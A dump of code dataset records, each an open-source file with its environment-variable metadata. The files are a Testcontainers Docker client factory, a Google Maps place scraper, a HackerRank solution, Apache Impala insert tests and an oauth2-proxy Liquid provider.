public static final Map<String, String> DEFAULT_LABELS = ImmutableMap.of(
TESTCONTAINERS_LABEL, "true",
TESTCONTAINERS_SESSION_ID_LABEL, SESSION_ID
);
private static final String TINY_IMAGE = TestcontainersConfiguration.getInstance().getTinyImage();
private static DockerClientFactory instance;
// Cached client configuration
@VisibleForTesting
DockerClientProviderStrategy strategy;
@VisibleForTesting
DockerClient dockerClient;
@VisibleForTesting
RuntimeException cachedChecksFailure;
private String activeApiVersion;
private String activeExecutionDriver;
@Getter(lazy = true)
private final boolean fileMountingSupported = checkMountableFile();
static {
System.setProperty("org.testcontainers.shaded.io.netty.packagePrefix", "org.testcontainers.shaded.");
}
@VisibleForTesting
DockerClientFactory() {
}
public static DockerClient lazyClient() {
return LazyDockerClient.INSTANCE;
}
/**
* Obtain an instance of the DockerClientFactory.
*
* @return the singleton instance of DockerClientFactory
*/
public synchronized static DockerClientFactory instance() {
if (instance == null) {
instance = new DockerClientFactory();
}
return instance;
}
@Synchronized
private DockerClientProviderStrategy getOrInitializeStrategy() {
if (strategy != null) {
return strategy;
}
List<DockerClientProviderStrategy> configurationStrategies = new ArrayList<>();
ServiceLoader.load(DockerClientProviderStrategy.class).forEach(configurationStrategies::add);
strategy = DockerClientProviderStrategy.getFirstValidStrategy(configurationStrategies);
return strategy;
}
/**
*
* @return a new initialized Docker client
*/
@Synchronized
public DockerClient client() {
if (dockerClient != null) {
return dockerClient;
}
// fail-fast if checks have failed previously
if (cachedChecksFailure != null) {
log.debug("There is a cached checks failure - throwing", cachedChecksFailure);
throw cachedChecksFailure;
}
final DockerClientProviderStrategy strategy = getOrInitializeStrategy();
String hostIpAddress = strategy.getDockerHostIpAddress();
log.info("Docker host IP address is {}", hostIpAddress);
final DockerClient client = strategy.getClient();
Info dockerInfo = client.infoCmd().exec();
Version version = client.versionCmd().exec();
activeApiVersion = version.getApiVersion();
activeExecutionDriver = dockerInfo.getExecutionDriver();
log.info("Connected to docker: \n" +
" Server Version: " + dockerInfo.getServerVersion() + "\n" +
" API Version: " + activeApiVersion + "\n" +
" Operating System: " + dockerInfo.getOperatingSystem() + "\n" +
" Total Memory: " + dockerInfo.getMemTotal() / (1024 * 1024) + " MB");
final String ryukContainerId;
boolean useRyuk = !Boolean.parseBoolean(System.getenv("TESTCONTAINERS_RYUK_DISABLED"));
if (useRyuk) {
log.debug("Ryuk is enabled");
ryukContainerId = ResourceReaper.start(hostIpAddress, client);
log.info("Ryuk started - will monitor and terminate Testcontainers containers on JVM exit");
} else {
log.debug("Ryuk is disabled");
ryukContainerId = null;
}
boolean checksEnabled = !TestcontainersConfiguration.getInstance().isDisableChecks();
if (checksEnabled) {
log.debug("Checks are enabled");
try {
log.info("Checking the system...");
checkDockerVersion(version.getVersion());
if (ryukContainerId != null) {
checkDiskSpace(client, ryukContainerId);
} else {
runInsideDocker(
client,
createContainerCmd -> {
createContainerCmd.withName("testcontainers-checks-" + SESSION_ID);
createContainerCmd.getHostConfig().withAutoRemove(true);
createContainerCmd.withCmd("tail", "-f", "/dev/null");
},
(__, containerId) -> {
checkDiskSpace(client, containerId);
return "";
}
);
}
} catch (RuntimeException e) {
cachedChecksFailure = e;
throw e;
}
} else {
log.debug("Checks are disabled");
}
dockerClient = client;
return dockerClient;
}
private void checkDockerVersion(String dockerVersion) {
boolean versionIsSufficient = new ComparableVersion(dockerVersion).compareTo(new ComparableVersion("1.6.0")) >= 0;
check("Docker server version should be at least 1.6.0", versionIsSufficient);
}
private void checkDiskSpace(DockerClient dockerClient, String id) {
ByteArrayOutputStream outputStream = new ByteArrayOutputStream();
try {
dockerClient
.execStartCmd(dockerClient.execCreateCmd(id).withAttachStdout(true).withCmd("df", "-P").exec().getId())
.exec(new ExecStartResultCallback(outputStream, null))
.awaitCompletion();
} catch (Exception e) {
log.debug("Can't exec disk checking command", e);
}
DiskSpaceUsage df = parseAvailableDiskSpace(outputStream.toString());
check(
"Docker environment should have more than 2GB free disk space",
df.availableMB.map(it -> it >= 2048).orElse(true)
);
}
private void check(String message, boolean isSuccessful) {
if (isSuccessful) {
log.info("\u2714︎ {}", message);
} else {
log.error("\u274c {}", message);
throw new IllegalStateException("Check failed: " + message);
}
}
private boolean checkMountableFile() {
DockerClient dockerClient = client();
MountableFile mountableFile = MountableFile.forClasspathResource(ResourceReaper.class.getName().replace(".", "/") + ".class");
Volume volume = new Volume("/dummy");
try {
return runInsideDocker(
createContainerCmd -> createContainerCmd.withBinds(new Bind(mountableFile.getMountablePath(), volume, AccessMode.ro)),
(__, containerId) -> {
try (InputStream stream = dockerClient.copyArchiveFromContainerCmd(containerId, volume.getPath()).exec()) {
stream.read();
return true;
} catch (Exception e) {
return false;
}
}
);
} catch (Exception e) {
log.debug("Failure while checking for mountable file support", e);
return false;
}
}
/**
* Check whether the image is available locally and pull it otherwise
*/
@SneakyThrows
public void checkAndPullImage(DockerClient client, String image) {
List<Image> images = client.listImagesCmd().withImageNameFilter(image).exec();
if (images.isEmpty()) {
client.pullImageCmd(image).exec(new TimeLimitedLoggedPullImageResultCallback(log)).awaitCompletion();
}
}
/**
* @return the IP address of the host running Docker
*/
public String dockerHostIpAddress() {
return getOrInitializeStrategy().getDockerHostIpAddress();
}
public <T> T runInsideDocker(Consumer<CreateContainerCmd> createContainerCmdConsumer, BiFunction<DockerClient, String, T> block) {
// We can't use client() here because it might create an infinite loop
return runInsideDocker(getOrInitializeStrategy().getClient(), createContainerCmdConsumer, block);
}
private <T> T runInsideDocker(DockerClient client, Consumer<CreateContainerCmd> createContainerCmdConsumer, BiFunction<DockerClient, String, T> block) {
checkAndPullImage(client, TINY_IMAGE);
CreateContainerCmd createContainerCmd = client.createContainerCmd(TINY_IMAGE)
.withLabels(DEFAULT_LABELS);
createContainerCmdConsumer.accept(createContainerCmd);
String id = createContainerCmd.exec().getId();
try {
client.startContainerCmd(id).exec();
return block.apply(client, id);
} finally {
try {
client.removeContainerCmd(id).withRemoveVolumes(true).withForce(true).exec();
} catch (NotFoundException | InternalServerErrorException e) {
log.debug("Swallowed exception while removing container", e);
}
}
}
@VisibleForTesting
static class DiskSpaceUsage {
Optional<Long> availableMB = Optional.empty();
Optional<Integer> usedPercent = Optional.empty();
}
@VisibleForTesting
DiskSpaceUsage parseAvailableDiskSpace(String dfOutput) {
DiskSpaceUsage df = new DiskSpaceUsage();
String[] lines = dfOutput.split("\n");
for (String line : lines) {
String[] fields = line.split("\\s+");
if (fields.length > 5 && fields[5].equals("/")) {
long availableKB = Long.parseLong(fields[3]);
df.availableMB = Optional.of(availableKB / 1024L);
df.usedPercent = Optional.of(Integer.valueOf(fields[4].replace("%", "")));
break;
}
}
return df;
}
/**
* @return the docker API version of the daemon that we have connected to
*/
public String getActiveApiVersion() {
client();
return activeApiVersion;
}
/**
* @return the docker execution driver of the daemon that we have connected to
*/
public String getActiveExecutionDriver() {
client();
return activeExecutionDriver;
}
/**
* @param providerStrategyClass a class that extends {@link DockerMachineClientProviderStrategy}
* @return whether or not the currently active strategy is of the provided type
*/
public boolean isUsing(Class<? extends DockerClientProviderStrategy> providerStrategyClass) {
return strategy != null && providerStrategyClass.isAssignableFrom(this.strategy.getClass());
}
}
| [
"\"TESTCONTAINERS_RYUK_DISABLED\""
] | [] | [
"TESTCONTAINERS_RYUK_DISABLED"
] | [] | ["TESTCONTAINERS_RYUK_DISABLED"] | java | 1 | 0 | |
kuwala/pipelines/google-poi/src/utils/google.py | import json
import os
from time import sleep
from quart import abort
import requests
from requests.exceptions import ConnectionError
from src.utils.array_utils import get_nested_value
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) "
"AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/54.0.2840.98 Safari/537.36"
}
def fetch_data(url, params):
proxy = os.environ.get("PROXY_ADDRESS")
proxies = dict(http=proxy, https=proxy)
sleep_time = 1
while True:
try:
response = requests.get(
url, params=params, proxies=proxies if proxy else None, headers=headers
)
if response.ok:
break
elif sleep_time < 60:
sleep(sleep_time)
sleep_time *= 2
else:
abort(429, "Too many request. Please check the proxy on the server")
except ConnectionError:
if sleep_time < 60:
sleep(sleep_time)
sleep_time *= 2
else:
abort(429, "Too many request. Please check the proxy on the server")
return response
def search(query):
"""
Get the data for a given query string
:param str query: String that is used for the search (name + address or place_id:{place_ide})
:return: The query string with its corresponding result
"""
url = "https://www.google.de/search"
params = {
"tbm": "map",
"tch": 1,
"hl": "en",
"q": query,
"pb": "!4m12!1m3!1d4005.9771522653964!2d-122.42072974863942!3d37.8077459796541!2m3!1f0!2f0!3f0!3m2!1i1125!2i976"
"!4f13.1!7i20!10b1!12m6!2m3!5m1!6e2!20e3!10b1!16b1!19m3!2m2!1i392!2i106!20m61!2m2!1i203!2i100!3m2!2i4!5b1"
"!6m6!1m2!1i86!2i86!1m2!1i408!2i200!7m46!1m3!1e1!2b0!3e3!1m3!1e2!2b1!3e2!1m3!1e2!2b0!3e3!1m3!1e3!2b0!3e3!"
"1m3!1e4!2b0!3e3!1m3!1e8!2b0!3e3!1m3!1e3!2b1!3e2!1m3!1e9!2b1!3e2!1m3!1e10!2b0!3e3!1m3!1e10!2b1!3e2!1m3!1e"
"10!2b0!3e4!2b1!4b1!9b0!22m6!1sa9fVWea_MsX8adX8j8AE%3A1!2zMWk6Mix0OjExODg3LGU6MSxwOmE5ZlZXZWFfTXNYOGFkWDh"
"qOEFFOjE!7e81!12e3!17sa9fVWea_MsX8adX8j8AE%3A564!18e15!24m15!2b1!5m4!2b1!3b1!5b1!6b1!10m1!8e3!17b1!24b1!"
"25b1!26b1!30m1!2b1!36b1!26m3!2m2!1i80!2i92!30m28!1m6!1m2!1i0!2i0!2m2!1i458!2i976!1m6!1m2!1i1075!2i0!2m2!"
"1i1125!2i976!1m6!1m2!1i0!2i0!2m2!1i1125!2i20!1m6!1m2!1i0!2i956!2m2!1i1125!2i976!37m1!1e81!42b1!47m0!49m1"
"!3b1",
}
response = fetch_data(url, params)
data = response.text.split('/*""*/')[0]
jend = data.rfind("}")
if jend >= 0:
data = data[: jend + 1]
jdata = json.loads(data)["d"]
jdata = json.loads(jdata[4:])
# Get info from result array, has to be adapted if api changes
data = get_nested_value(jdata, 0, 1, 0, 14)
# Check second result
if data is None:
data = get_nested_value(jdata, 0, 1, 1, 14)
return dict(query=query, data=data)
def get_by_id(pb_id):
"""
Get the data for a given id
:param str pb_id: Id that is used to retrieve a specific place over the pb query parameter
:return: The id with its corresponding result
"""
url = "https://www.google.com/maps/preview/place"
params = {
"authuser": 0,
"hl": "en",
"gl": "en",
"pb": f"!1m17!1s{pb_id}!3m12!1m3!1d4005.9771522653964!2d-122.42072974863942!3d37.8077459796541!2m3!1f0!2f0"
"!3f0!3m2!1i1440!2i414!4f13.1!4m2!3d-122.42072974863942!4d37.8077459796541!12m4!2m3!1i360!2i120!4i8"
"!13m65!2m2!1i203!2i100!3m2!2i4!5b1!6m6!1m2!1i86!2i86!1m2!1i408!2i240!7m50!1m3!1e1!2b0!3e3!1m3!1e2!2b1"
"!3e2!1m3!1e2!2b0!3e3!1m3!1e3!2b0!3e3!1m3!1e8!2b0!3e3!1m3!1e3!2b1!3e2!1m3!1e10!2b0!3e3!1m3!1e10!2b1"
"!3e2!1m3!1e9!2b1!3e2!1m3!1e10!2b0!3e3!1m3!1e10!2b1!3e2!1m3!1e10!2b0!3e4!2b1!4b1!9b0!14m5"
"!1sTpKbYLDlD47FUrPBo4gL!4m1!2i5210!7e81!12e3!15m55!1m17!4e2!13m7!2b1!3b1!4b1!6i1!8b1!9b1!20b1!18m7"
"!3b1!4b1!5b1!6b1!9b1!13b1!14b0!2b1!5m5!2b1!3b1!5b1!6b1!7b1!10m1!8e3!14m1!3b1!17b1!20m2!1e3!1e6!24b1"
"!25b1!26b1!29b1!30m1!2b1!36b1!43b1!52b1!54m1!1b1!55b1!56m2!1b1!3b1!65m5!3m4!1m3!1m2!1i224!2i298!89b1"
"!21m28!1m6!1m2!1i0!2i0!2m2!1i458!2i414!1m6!1m2!1i1390!2i0!2m2!1i1440!2i414!1m6!1m2!1i0!2i0!2m2!1i1440"
"!2i20!1m6!1m2!1i0!2i394!2m2!1i1440!2i414!22m1!1e81!29m0!30m1!3b1!34m2!7b1!10b1!37i557",
}
response = fetch_data(url, params)
data = response.text.split("'\n")[1]
data = json.loads(data)
return dict(id=pb_id, data=data)
| [] | [] | [
"PROXY_ADDRESS"
] | [] | ["PROXY_ADDRESS"] | python | 1 | 0 | |
utopian-tree.py | #!/bin/python3
import math
import os
import random
import re
import sys
# Complete the utopianTree function below.
def utopianTree(n):
h = 1
for i in range(1, n + 1):
if i % 2 == 1:
h *= 2
else:
h += 1
return h
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
t = int(input())
for t_itr in range(t):
n = int(input())
result = utopianTree(n)
fptr.write(str(result) + '\n')
fptr.close()
| [] | [] | [
"OUTPUT_PATH"
] | [] | ["OUTPUT_PATH"] | python | 1 | 0 | |
tests/query_test/test_insert.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# Targeted Impala insert tests
import os
import pytest
import re
from testdata.common import widetable
from tests.common.impala_cluster import ImpalaCluster
from tests.common.impala_test_suite import ImpalaTestSuite
from tests.common.parametrize import UniqueDatabase
from tests.common.skip import SkipIfABFS, SkipIfEC, SkipIfLocal, \
SkipIfHive2, SkipIfNotHdfsMinicluster, SkipIfS3, SkipIfDockerizedCluster
from tests.common.test_dimensions import (
create_exec_option_dimension,
create_uncompressed_text_dimension)
from tests.common.test_result_verifier import (
QueryTestResult,
parse_result_rows)
from tests.common.test_vector import ImpalaTestDimension
from tests.verifiers.metric_verifier import MetricVerifier
PARQUET_CODECS = ['none', 'snappy', 'gzip', 'zstd', 'lz4']
class TestInsertQueries(ImpalaTestSuite):
@classmethod
def get_workload(self):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestInsertQueries, cls).add_test_dimensions()
# Fix the exec_option vector to have a single value. This is needed should we decide
# to run the insert tests in parallel (otherwise there will be two tests inserting
# into the same table at the same time for the same file format).
# TODO: When we do decide to run these tests in parallel we could create unique temp
# tables for each test case to resolve the concurrency problems.
if cls.exploration_strategy() == 'core':
cls.ImpalaTestMatrix.add_dimension(create_exec_option_dimension(
cluster_sizes=[0], disable_codegen_options=[True, False], batch_sizes=[0],
sync_ddl=[0]))
cls.ImpalaTestMatrix.add_dimension(
create_uncompressed_text_dimension(cls.get_workload()))
else:
cls.ImpalaTestMatrix.add_dimension(create_exec_option_dimension(
cluster_sizes=[0], disable_codegen_options=[True, False], batch_sizes=[0, 1, 16],
sync_ddl=[0, 1]))
cls.ImpalaTestMatrix.add_dimension(
ImpalaTestDimension("compression_codec", *PARQUET_CODECS));
# Insert is currently only supported for text and parquet
# For parquet, we want to iterate through all the compression codecs
# TODO: each column in parquet can have a different codec. We could
# test all the codecs in one table/file with some additional flags.
cls.ImpalaTestMatrix.add_constraint(lambda v:\
v.get_value('table_format').file_format == 'parquet' or \
(v.get_value('table_format').file_format == 'text' and \
v.get_value('compression_codec') == 'none'))
cls.ImpalaTestMatrix.add_constraint(lambda v:\
v.get_value('table_format').compression_codec == 'none')
# Only test other batch sizes for uncompressed parquet to keep the execution time
# within reasonable bounds.
cls.ImpalaTestMatrix.add_constraint(lambda v:\
v.get_value('exec_option')['batch_size'] == 0 or \
(v.get_value('table_format').file_format == 'parquet' and \
v.get_value('compression_codec') == 'none'))
@pytest.mark.execute_serially
def test_insert_large_string(self, vector, unique_database):
"""Test handling of large strings in inserter and scanner."""
if "-Xcheck:jni" in os.environ.get("LIBHDFS_OPTS", ""):
pytest.skip("Test unreasonably slow with JNI checking.")
table_name = unique_database + ".insert_largestring"
self.client.set_configuration_option("mem_limit", "4gb")
file_format = vector.get_value('table_format').file_format
if file_format == "parquet":
stored_as = file_format
else:
assert file_format == "text"
stored_as = "textfile"
self.client.execute("""
create table {0}
stored as {1} as
select repeat('AZ', 128 * 1024 * 1024) as s""".format(table_name, stored_as))
# Make sure it produces correct result when materializing no tuples.
result = self.client.execute("select count(*) from {0}".format(table_name))
assert result.data == ["1"]
# Make sure it got the length right.
result = self.client.execute("select length(s) from {0}".format(table_name))
assert result.data == [str(2 * 128 * 1024 * 1024)]
# Spot-check the data.
result = self.client.execute(
"select substr(s, 200 * 1024 * 1024, 5) from {0}".format(table_name))
assert result.data == ["ZAZAZ"]
# IMPALA-7648: test that we gracefully fail when there is not enough memory
# to fit the scanned string in memory.
self.client.set_configuration_option("mem_limit", "50M")
try:
self.client.execute("select s from {0}".format(table_name))
assert False, "Expected query to fail"
except Exception, e:
assert "Memory limit exceeded" in str(e)
@classmethod
def setup_class(cls):
super(TestInsertQueries, cls).setup_class()
@UniqueDatabase.parametrize(sync_ddl=True)
# Erasure coding doesn't respect memory limit
@SkipIfEC.fix_later
# ABFS partition names cannot end in periods
@SkipIfABFS.file_or_folder_name_ends_with_period
def test_insert(self, vector, unique_database):
if (vector.get_value('table_format').file_format == 'parquet'):
vector.get_value('exec_option')['COMPRESSION_CODEC'] = \
vector.get_value('compression_codec')
self.run_test_case('QueryTest/insert', vector, unique_database,
multiple_impalad=vector.get_value('exec_option')['sync_ddl'] == 1,
test_file_vars={'$ORIGINAL_DB': ImpalaTestSuite
.get_db_name_from_format(vector.get_value('table_format'))})
@SkipIfHive2.acid
@UniqueDatabase.parametrize(sync_ddl=True)
def test_acid_insert(self, vector, unique_database):
exec_options = vector.get_value('exec_option')
file_format = vector.get_value('table_format').file_format
if (file_format == 'parquet'):
exec_options['COMPRESSION_CODEC'] = vector.get_value('compression_codec')
exec_options['DEFAULT_FILE_FORMAT'] = file_format
self.run_test_case('QueryTest/acid-insert', vector, unique_database,
multiple_impalad=exec_options['sync_ddl'] == 1)
@SkipIfHive2.acid
@UniqueDatabase.parametrize(sync_ddl=True)
def test_acid_nonacid_insert(self, vector, unique_database):
self.run_test_case('QueryTest/acid-nonacid-insert', vector, unique_database,
multiple_impalad=vector.get_value('exec_option')['sync_ddl'] == 1)
@SkipIfHive2.acid
@UniqueDatabase.parametrize(sync_ddl=True)
def test_acid_insert_fail(self, vector, unique_database):
self.run_test_case('QueryTest/acid-insert-fail', vector, unique_database,
multiple_impalad=vector.get_value('exec_option')['sync_ddl'] == 1)
@UniqueDatabase.parametrize(sync_ddl=True)
@pytest.mark.execute_serially
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
def test_insert_mem_limit(self, vector, unique_database):
if (vector.get_value('table_format').file_format == 'parquet'):
vector.get_value('exec_option')['COMPRESSION_CODEC'] = \
vector.get_value('compression_codec')
self.run_test_case('QueryTest/insert-mem-limit', vector, unique_database,
multiple_impalad=vector.get_value('exec_option')['sync_ddl'] == 1,
test_file_vars={'$ORIGINAL_DB': ImpalaTestSuite
.get_db_name_from_format(vector.get_value('table_format'))})
# IMPALA-7023: These queries can linger and use up memory, causing subsequent
# tests to hit memory limits. Wait for some time to allow the query to
# be reclaimed.
verifiers = [MetricVerifier(i.service)
for i in ImpalaCluster.get_e2e_test_cluster().impalads]
for v in verifiers:
v.wait_for_metric("impala-server.num-fragments-in-flight", 0, timeout=180)
@UniqueDatabase.parametrize(sync_ddl=True)
def test_insert_overwrite(self, vector, unique_database):
self.run_test_case('QueryTest/insert_overwrite', vector, unique_database,
multiple_impalad=vector.get_value('exec_option')['sync_ddl'] == 1,
test_file_vars={'$ORIGINAL_DB': ImpalaTestSuite
.get_db_name_from_format(vector.get_value('table_format'))})
@UniqueDatabase.parametrize(sync_ddl=True)
def test_insert_bad_expr(self, vector, unique_database):
# The test currently relies on codegen being disabled to trigger an error in
# the output expression of the table sink.
if vector.get_value('exec_option')['disable_codegen']:
self.run_test_case('QueryTest/insert_bad_expr', vector, unique_database,
multiple_impalad=vector.get_value('exec_option')['sync_ddl'] == 1,
test_file_vars={'$ORIGINAL_DB': ImpalaTestSuite
.get_db_name_from_format(vector.get_value('table_format'))})
@UniqueDatabase.parametrize(sync_ddl=True)
def test_insert_random_partition(self, vector, unique_database):
"""Regression test for IMPALA-402: partitioning by rand() leads to strange behaviour
or crashes."""
self.run_test_case('QueryTest/insert-random-partition', vector, unique_database,
multiple_impalad=vector.get_value('exec_option')['sync_ddl'] == 1)
class TestInsertWideTable(ImpalaTestSuite):
@classmethod
def get_workload(self):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestInsertWideTable, cls).add_test_dimensions()
# Only vary codegen
cls.ImpalaTestMatrix.add_dimension(create_exec_option_dimension(
cluster_sizes=[0], disable_codegen_options=[True, False], batch_sizes=[0]))
# Inserts only supported on text and parquet
# TODO: Enable 'text'/codec once the compressed text writers are in.
cls.ImpalaTestMatrix.add_constraint(lambda v:\
v.get_value('table_format').file_format == 'parquet' or \
v.get_value('table_format').file_format == 'text')
cls.ImpalaTestMatrix.add_constraint(lambda v:\
v.get_value('table_format').compression_codec == 'none')
# Don't run on core. This test is very slow (IMPALA-864) and we are unlikely to
# regress here.
if cls.exploration_strategy() == 'core':
cls.ImpalaTestMatrix.add_constraint(lambda v: False);
@SkipIfLocal.parquet_file_size
def test_insert_wide_table(self, vector, unique_database):
table_format = vector.get_value('table_format')
# Text can't handle as many columns as Parquet (codegen takes forever)
num_cols = 1000 if table_format.file_format == 'text' else 2000
table_name = unique_database + ".insert_widetable"
if vector.get_value('exec_option')['disable_codegen']:
table_name += "_codegen_disabled"
col_descs = widetable.get_columns(num_cols)
create_stmt = "CREATE TABLE " + table_name + "(" + ','.join(col_descs) + ")"
if vector.get_value('table_format').file_format == 'parquet':
create_stmt += " stored as parquet"
self.client.execute(create_stmt)
# Get a single row of data
col_vals = widetable.get_data(num_cols, 1, quote_strings=True)[0]
insert_stmt = "INSERT INTO " + table_name + " VALUES(" + col_vals + ")"
self.client.execute(insert_stmt)
result = self.client.execute("select count(*) from " + table_name)
assert result.data == ["1"]
result = self.client.execute("select * from " + table_name)
types = result.column_types
labels = result.column_labels
expected = QueryTestResult([col_vals], types, labels, order_matters=False)
actual = QueryTestResult(parse_result_rows(result), types, labels, order_matters=False)
assert expected == actual
class TestInsertPartKey(ImpalaTestSuite):
"""Regression test for IMPALA-875"""
@classmethod
def get_workload(self):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestInsertPartKey, cls).add_test_dimensions()
# Only run for a single table type
cls.ImpalaTestMatrix.add_dimension(create_exec_option_dimension(
cluster_sizes=[0], disable_codegen_options=[False], batch_sizes=[0],
sync_ddl=[1]))
cls.ImpalaTestMatrix.add_constraint(lambda v:
(v.get_value('table_format').file_format == 'text'))
cls.ImpalaTestMatrix.add_constraint(lambda v:\
v.get_value('table_format').compression_codec == 'none')
@pytest.mark.execute_serially
def test_insert_part_key(self, vector):
"""Test that partition column exprs are cast to the correct type. See IMPALA-875."""
self.run_test_case('QueryTest/insert_part_key', vector,
multiple_impalad=vector.get_value('exec_option')['sync_ddl'] == 1)
class TestInsertNullQueries(ImpalaTestSuite):
@classmethod
def get_workload(self):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestInsertNullQueries, cls).add_test_dimensions()
# Fix the exec_option vector to have a single value. This is needed should we decide
# to run the insert tests in parallel (otherwise there will be two tests inserting
# into the same table at the same time for the same file format).
# TODO: When we do decide to run these tests in parallel we could create unique temp
# tables for each test case to resolve the concurrency problems.
cls.ImpalaTestMatrix.add_dimension(create_exec_option_dimension(
cluster_sizes=[0], disable_codegen_options=[False], batch_sizes=[0]))
# These tests only make sense for inserting into a text table with special
# logic to handle all the possible ways NULL needs to be written as ascii
cls.ImpalaTestMatrix.add_constraint(lambda v:\
(v.get_value('table_format').file_format == 'text' and \
v.get_value('table_format').compression_codec == 'none'))
@classmethod
def setup_class(cls):
super(TestInsertNullQueries, cls).setup_class()
def test_insert_null(self, vector, unique_database):
self.run_test_case('QueryTest/insert_null', vector, unique_database,
test_file_vars={'$ORIGINAL_DB': ImpalaTestSuite
.get_db_name_from_format(vector.get_value('table_format'))})
class TestInsertFileExtension(ImpalaTestSuite):
"""Tests that files written to a table have the correct file extension. Asserts that
Parquet files end with .parq and text files end with .txt."""
@classmethod
def get_workload(self):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
cls.ImpalaTestMatrix.add_dimension(ImpalaTestDimension(
'table_format_and_file_extension',
*[('parquet', '.parq'), ('textfile', '.txt')]))
@classmethod
def setup_class(cls):
super(TestInsertFileExtension, cls).setup_class()
def test_file_extension(self, vector, unique_database):
table_format = vector.get_value('table_format_and_file_extension')[0]
file_extension = vector.get_value('table_format_and_file_extension')[1]
table_name = "{0}_table".format(table_format)
ctas_query = "create table {0}.{1} stored as {2} as select 1".format(
unique_database, table_name, table_format)
self.execute_query_expect_success(self.client, ctas_query)
for path in self.filesystem_client.ls("test-warehouse/{0}.db/{1}".format(
unique_database, table_name)):
if not path.startswith('_'): assert path.endswith(file_extension)
class TestInsertHdfsWriterLimit(ImpalaTestSuite):
"""Test to make sure writer fragment instances are distributed evenly when using max
hdfs_writers query option."""
@classmethod
def get_workload(self):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestInsertHdfsWriterLimit, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_constraint(lambda v:
(v.get_value('table_format').file_format == 'parquet'))
@UniqueDatabase.parametrize(sync_ddl=True)
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
def test_insert_writer_limit(self, unique_database):
# Root internal (non-leaf) fragment.
query = "create table {0}.test1 as select int_col from " \
"functional_parquet.alltypes".format(unique_database)
self.__run_insert_and_verify_instances(query, max_fs_writers=2, mt_dop=0,
expected_num_instances_per_host=[1, 2, 2])
# Root coordinator fragment.
query = "create table {0}.test2 as select int_col from " \
"functional_parquet.alltypes limit 100000".format(unique_database)
self.__run_insert_and_verify_instances(query, max_fs_writers=2, mt_dop=0,
expected_num_instances_per_host=[1, 1, 2])
# Root scan fragment. Instance count within limit.
query = "create table {0}.test3 as select int_col from " \
"functional_parquet.alltypes".format(unique_database)
self.__run_insert_and_verify_instances(query, max_fs_writers=4, mt_dop=0,
expected_num_instances_per_host=[1, 1, 1])
@UniqueDatabase.parametrize(sync_ddl=True)
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
def test_mt_dop_writer_limit(self, unique_database):
# Root internal (non-leaf) fragment.
query = "create table {0}.test1 as select int_col from " \
"functional_parquet.alltypes".format(unique_database)
self.__run_insert_and_verify_instances(query, max_fs_writers=11, mt_dop=10,
expected_num_instances_per_host=[11, 12, 12])
# Root coordinator fragment.
query = "create table {0}.test2 as select int_col from " \
"functional_parquet.alltypes limit 100000".format(unique_database)
self.__run_insert_and_verify_instances(query, max_fs_writers=2, mt_dop=10,
expected_num_instances_per_host=[8, 8, 9])
# Root scan fragment. Instance count within limit.
query = "create table {0}.test3 as select int_col from " \
"functional_parquet.alltypes".format(unique_database)
self.__run_insert_and_verify_instances(query, max_fs_writers=30, mt_dop=10,
expected_num_instances_per_host=[8, 8, 8])
def __run_insert_and_verify_instances(self, query, max_fs_writers, mt_dop,
expected_num_instances_per_host):
self.client.set_configuration_option("max_fs_writers", max_fs_writers)
self.client.set_configuration_option("mt_dop", mt_dop)
# Test depends on both planner and scheduler to see the same state of the cluster
# having 3 executors, so to reduce flakiness we make sure all 3 executors are up
# and running.
self.impalad_test_service.wait_for_metric_value("cluster-membership.backends.total",
3)
result = self.client.execute(query)
assert 'HDFS WRITER' in result.exec_summary[0]['operator'], result.runtime_profile
assert int(result.exec_summary[0]['num_instances']) <= int(
max_fs_writers), result.runtime_profile
regex = r'Per Host Number of Fragment Instances' \
r':.*?\((.*?)\).*?\((.*?)\).*?\((.*?)\).*?\n'
matches = re.findall(regex, result.runtime_profile)
assert len(matches) == 1 and len(matches[0]) == 3, result.runtime_profile
num_instances_per_host = [int(i) for i in matches[0]]
num_instances_per_host.sort()
expected_num_instances_per_host.sort()
assert num_instances_per_host == expected_num_instances_per_host, \
result.runtime_profile
self.client.clear_configuration()
| [] | [] | [
"LIBHDFS_OPTS"
] | [] | ["LIBHDFS_OPTS"] | python | 1 | 0 | |
providers/liquid.go | package providers
import (
"bytes"
"context"
"errors"
"fmt"
"log"
"net/url"
"os"
"time"
"github.com/oauth2-proxy/oauth2-proxy/v7/pkg/apis/sessions"
"github.com/oauth2-proxy/oauth2-proxy/v7/pkg/requests"
)
/* LiquidProvider type has a pointer to a ProviderData type, which stores
the login, redeem and profile urls as well as the "read" scope. The scheme
(which is http or https) and host are taken from the env variables. The
provider is very similar to the DigitalOcean provider. */
type LiquidProvider struct {
*ProviderData
}
var _ Provider = (*LiquidProvider)(nil)
var (
LiquidScheme = os.Getenv("LIQUID_HTTP_PROTOCOL")
LiquidHost = os.Getenv("LIQUID_DOMAIN")
)
const (
LiquidProviderName = "Liquid"
LiquidDefaultScope = "read"
)
var (
LiquidDefaultLoginURL = &url.URL{
Scheme: LiquidScheme,
Host: LiquidHost,
Path: "/o/authorize/",
}
LiquidDefaultRedeemURL = &url.URL{
Scheme: LiquidScheme,
Host: LiquidHost,
Path: "/o/token/",
}
LiquidDefaultProfileURL = &url.URL{
Scheme: LiquidScheme,
Host: LiquidHost,
Path: "/accounts/profile",
}
)
